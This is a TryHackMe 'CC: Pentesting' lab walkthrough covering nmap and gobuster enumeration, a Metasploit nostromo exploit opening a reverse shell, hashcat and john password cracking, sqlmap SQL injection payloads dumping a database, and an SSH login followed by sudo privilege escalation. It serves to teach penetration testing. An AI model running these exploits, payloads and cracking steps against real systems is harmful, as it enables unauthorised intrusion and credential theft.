CC: Pentesting
For complete tryhackme path, refer the link
Task 2 - Network Utilities - nmap
References
Answer to all 4 questions at the last can be obtained from one single nmap command.
nmap -sV -sC <ip>
The output will be similar to
Nmap scan report for <ip>
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http <service> httpd <version> ((Ubuntu))
|_http-title: <title>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.06 seconds
Task 4 - Web enumeration - gobuster
References
It is better to use rockyou.txt wordlist than common.txt wordlist in dirb. To setup rockyou.txt wordlist, check the link. For quicker results, use common.txt wordlist in dirb.
Deploy the machine and scan the url.
gobuster dir -u http://<ip> -w /usr/share/dirb/wordlists/common.txt --no-error
An output similar to following will be obtained, which will reveal a hidden directory.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://<ip>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2020/12/24 01:43:22 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 11321]
/<flag> (Status: 301) [Size: 315] [--> http://10.10.224.132/<flag>/]
/server-status (Status: 403) [Size: 278]
===============================================================
2020/12/24 01:45:02 Finished
===============================================================
Scan the url again with extension option to get hidden file.
gobuster dir -u http://<ip> -w /usr/share/dirb/wordlists/common.txt -x xxa --random-agent --no-error
An output similar to following will be obtained, which will reveal a hidden file with xxa extension.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://<ip>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
[+] Extensions: xxa
[+] Timeout: 10s
===============================================================
2020/12/24 01:48:43 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.hta.xxa (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess.xxa (Status: 403) [Size: 278]
/.htpasswd.xxa (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 11321]
/<flag>.xxa (Status: 200) [Size: 12]
/<previous-flag> (Status: 301) [Size: 315] [--> http://10.10.224.132/<previous-flag>/]
/server-status (Status: 403) [Size: 278]
===============================================================
2020/12/24 01:52:24 Finished
===============================================================
Task 10 - Metasploit - Final Walkthrough
References
Use metasploit to find the flag. Deploy the machine and fire up metasploit. Set the payload exploit/multi/http/nostromo_code_exec.
msf6 > use exploit/multi/http/nostromo_code_exec
[*] Using configured payload cmd/unix/reverse_perl
Set remote host address and port, and local host address. Local Host address is the connected IP address in THM page. This can also be found using ip a command output.
msf6 exploit(multi/http/nostromo_code_exec) > set RHOST <target-ip>
RHOST => <target-ip>
msf6 exploit(multi/http/nostromo_code_exec) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/nostromo_code_exec) > set LHOST <vpn-ip>
LHOST => <vpn-ip>
Check if the options are alright for exploit.
msf6 exploit(multi/http/nostromo_code_exec) > show options
Module options (exploit/multi/http/nostromo_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS <target-ip> yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST <vpn-ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
Exploit and gain shell to find flags.
msf6 exploit(multi/http/nostromo_code_exec) > exploit
[*] Started reverse TCP handler on <vpn-ip>:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (<vpn-ip>:4444 -> <target-ip>:49596) at 2020-12-24 20:11:05 +0530
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash
pwd
/bin
_nostromo@ubuntu:/bin$ cd /var/nostromo/htdocs
cd /var/nostromo/htdocs
_nostromo@ubuntu:/var/nostromo/htdocs$ ls
ls
index.html nostromo.gif <flag-1>
_nostromo@ubuntu:/var/nostromo/htdocs$ ls <flag-1>
ls <flag-1>
nice
_nostromo@ubuntu:/var/nostromo/htdocs$ cat <flag-1>/nice
cat <flag-1>/nice
<flag-2>
Abort session 1? [y/N] y
[*] <target-ip> - Command shell session 1 closed. Reason: User exit
Task 13 - Hash Cracking - hashcat
References
The two tasks mentioned can be done either via hashcat command or online resouces, like this or this. If getting Segmentation Fault while using hashcat, either use the link to setup proper drivers, or use THM attackbox, or use online hash cracking to get the flag.
Use the following command to decrypt MD5 hash.
hashcat -m0 -a0 -O --force "56ab24c15b72a457069c5ea42fcfc640" /usr/share/wordlists/rockyou.txt
The cracked password will be similar to,
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs
56ab24c15b72a457069c5ea42fcfc640:<flag>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sat Dec 24 03:34:49 2020, (0 secs)
Time.Estimated...: Sat Dec 24 03:34:49 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 439.6 kH/s (0.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1
Use the following command to decrypt MD4 hash.
hashcat -m900 -a0 -O --force "4bc9ae2b9236c2ad02d81491dcb51d5f" /usr/share/wordlists/rockyou.txt
The cracked password will be similar to,
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
4bc9ae2b9236c2ad02d81491dcb51d5f:<flag>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD4
Hash.Target......: 4bc9ae2b9236c2ad02d81491dcb51d5f
Time.Started.....: Sat Dec 24 03:40:39 2020, (2 secs)
Time.Estimated...: Sat Dec 24 03:40:41 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 733.1 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 839704/14344385 (5.85%)
Rejected.........: 24/839704 (0.00%)
Restore.Point....: 837656/14344385 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: notnotnot -> ninja202
Task 14 - Hash Cracking - John the Ripper
References
Check available formats for use with john command john --list=formats. Sometimes, john will show an output No password hashes left to crack (see FAQ) for some hashes. Using a manual pot file resolves this issue.
To crack the MD5 hash, copy the hash to a file for cracking, echo "5d41402abc4b2a76b9719d911017c592" > /data/hash.txt. Use the following command to crack the password.
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt --pot=/data/john.pot /data/hash.txt
Similar output will be obtained.
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE4.1 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
<flag> (?)
1g 0:00:00:00 DONE (2020-12-24 04:21) 50.00g/s 9600p/s 9600c/s 9600C/s 123456..november
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
To crack the SHA1 hash, copy the hash to a file for cracking, echo "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" > /data/hash.txt. Use the following command to crack the password.
john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt --pot=/data/john.pot /data/hash.txt
Similar output will be obtained.
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE4.1 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
<flag> (?)
1g 0:00:00:00 DONE (2020-12-24 04:25) 100.0g/s 400.0p/s 400.0c/s 400.0C/s 123456..password
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
Task 18 - SQL Injection - Vulnerable Web Application
References
Deploy the machine and check web response, using curl <ip>
!<DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Add Record Form</title>
</head>
<body>
<form action="/" method="post">
<p>msg: </p> <input type="text" name="msg" id="msgg">
</form>
</body>
</html>
There is a parameter named msg, which could be exploited. To get the flag in MySQL backend of vulnerable web app, use the command,
sqlmap -u "http://<ip>" --data "msg=test" -p msg --dump --batch -v 0
The following response would be obtained.
[*] starting @ 04:44:00 /2020-12-24/
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
POST parameter 'msg' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: msg (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg=test' RLIKE (SELECT (CASE WHEN (6965=6965) THEN 0x74657374 ELSE 0x28 END))-- eMep
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: msg=test' AND (SELECT 1792 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(1792=1792,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zCjW
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: msg=test' AND SLEEP(5)-- IIix
---
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.0
Database: <flag1>
Table: msg
[2 entries]
+------+
| msg |
+------+
| msg |
| test |
+------+
Database: <flag1>
Table: lol
[1 entry]
+----------+
| flag |
+----------+
| <flag3> |
+----------+
[*] ending @ 04:45:21 /2020-12-24/
Task 24 - Final Exam
Deploy the machine, and do a quick basic enumeration,
nmap -Pn -n -T4 -F <ip>
The list of open ports can be seen.
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-24 04:52 IST
Nmap scan report for <ip>
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5101/tcp filtered admdog
Nmap done: 1 IP address (1 host up) scanned in 2.19 seconds
Check if we get response on port 80.
curl -I -L -s <ip>
The response would be similar to
HTTP/1.1 200 OK
Date: Fri, 23 Dec 2020 23:26:53 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Sat, 21 Dec 2019 02:19:15 GMT
ETag: "2c39-59a2d6bc5ae41"
Accept-Ranges: bytes
Content-Length: 11321
Vary: Accept-Encoding
Content-Type: text/html
Check if gobuster can detect the directories and files. We could use common.txt wordlist from dirb for quick enumeration.
gobuster dir -u "http://<ip>" -w /usr/share/dirb/wordlists/common.txt --random-agent --no-error
Similar output will be obtained.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://<ip>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5
[+] Timeout: 10s
===============================================================
2020/12/24 05:02:11 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 311] [--> http://10.10.95.65/secret/]
/server-status (Status: 403) [Size: 276]
===============================================================
2020/12/24 05:03:26 Finished
===============================================================
Check if we can find any text files in /secret directory.
gobuster dir -u "http://<ip>/secret" -x txt -w /usr/share/dirb/wordlists/common.txt --random-agent --no-error
An output similar will be obtained.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://<ip>/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/12/24 05:04:39 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.hta.txt (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess.txt (Status: 403) [Size: 276]
/.htpasswd.txt (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 0]
/secret.txt (Status: 200) [Size: 46]
===============================================================
2020/12/24 05:07:09 Finished
===============================================================
Check if we can read contents of /secret.txt file.
curl http://<ip>/secret/secret.txt
We get a hashed password nyan:046385855FC9580393853D8E81F240B66FE9A7B8.
Check what kind of hash we got, using,
hashid -m 046385855FC9580393853D8E81F240B66FE9A7B8
We get recommendations on what could be the type of hash.
Analyzing '046385855FC9580393853D8E81F240B66FE9A7B8'
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn [Hashcat Mode: 190]
[+] Skein-256(160)
[+] Skein-512(160)
This can be decrypted using either hashcat or john.
hashcat -m100 -a0 -O --force "046385855FC9580393853D8E81F240B66FE9A7B8" /usr/share/wordlists/rockyou.txt
The cracked password can be seen by,
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
046385855fc9580393853d8e81f240b66fe9a7b8:<password>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Sat Dec 24 05:14:29 2020, (7 secs)
Time.Estimated...: Sat Dec 24 05:14:36 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 666.1 kH/s (1.10ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4971567/14344385 (34.66%)
Rejected.........: 1071/4971567 (0.02%)
Restore.Point....: 4969519/14344385 (34.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: nydia26 -> ny11590
Started: Sat Dec 24 05:14:26 2020
Stopped: Sat Dec 24 05:14:38 2020
Try to ssh the machine ssh nyan@<ip>.
nyan@<ip>'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$ ls
user.txt
The contents of user.txt is the first flag.
Check if nyan is allowed to run any sudo commands.
nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nyan may run the following commands on ubuntu:
(root) NOPASSWD: /bin/su
Switch to root user to get second flag in root.txt file.
nyan@ubuntu:~$ sudo su -
root@ubuntu:~# ls
root.txt